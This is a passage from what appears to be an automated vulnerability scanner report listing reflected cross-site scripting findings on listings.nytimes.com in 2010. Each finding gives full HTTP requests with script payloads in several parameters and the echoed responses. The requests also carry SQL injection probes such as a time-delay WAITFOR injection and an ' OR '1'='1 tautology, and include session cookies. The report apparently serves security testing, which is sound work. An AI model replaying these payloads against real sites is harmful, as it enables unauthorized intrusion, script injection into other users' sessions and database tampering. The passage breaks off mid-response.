4.236. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [UserPwd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the UserPwd request parameter is copied into the HTML document as plain text between tags. The payload d13da<script>alert(1)</script>9f24e99d8f92b7556 was submitted in the UserPwd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3d13da<script>alert(1)</script>9f24e99d8f92b7556 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:45:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCQRTDT=MHFPHCHADMOOMINOMBKPKIBO; path=/
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail
...[SNIP]...
N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3d13da<script>alert(1)</script>9f24e99d8f92b7556

4.237. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [UserPwd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the UserPwd request parameter is copied into the HTML document as plain text between tags. The payload a6641<script>alert(1)</script>4a57fccb82e was submitted in the UserPwd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3a6641<script>alert(1)</script>4a57fccb82e

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=
...[SNIP]...
N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3a6641<script>alert(1)</script>4a57fccb82e<h1>
...[SNIP]...

4.238. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fd694<script>alert(1)</script>0e56289a6da was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999fd694<script>alert(1)</script>0e56289a6da&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N10
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:24:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999fd694<script>alert(1)</script>0e56289a6da&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N100
...[SNIP]...

4.239. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f3a"><script>alert(1)</script>5a7486e1e7de3d4ba was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999e2f3a"><script>alert(1)</script>5a7486e1e7de3d4ba&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91388
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="cid" value="999e2f3a"><script>alert(1)</script>5a7486e1e7de3d4ba">
...[SNIP]...

4.240. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ctRS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ctRS request parameter is copied into the HTML document as plain text between tags. The payload 3e360<script>alert(1)</script>6773c1113b6 was submitted in the ctRS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=103e360<script>alert(1)</script>6773c1113b6&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N101
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=103e360<script>alert(1)</script>6773c1113b6&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010
...[SNIP]...

4.241. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ctRS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ctRS request parameter is copied into the HTML document as plain text between tags. The payload 3b7a2<script>alert(1)</script>c2d6adda6787a710e was submitted in the ctRS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=103b7a2<script>alert(1)</script>c2d6adda6787a710e&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:35:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=103b7a2<script>alert(1)</script>c2d6adda6787a710e&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010
...[SNIP]...

4.242. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [intl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the intl request parameter is copied into the HTML document as plain text between tags. The payload ed994<script>alert(1)</script>af3a0038896 was submitted in the intl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3ed994<script>alert(1)</script>af3a0038896&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3ed994<script>alert(1)</script>af3a0038896&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&S
...[SNIP]...

4.243. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [intl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the intl request parameter is copied into the HTML document as plain text between tags. The payload 48b89<script>alert(1)</script>4b89bbb041aa5281 was submitted in the intl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=348b89<script>alert(1)</script>4b89bbb041aa5281&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:36:47 GMT
Server: Microsoft-IIS/6.0
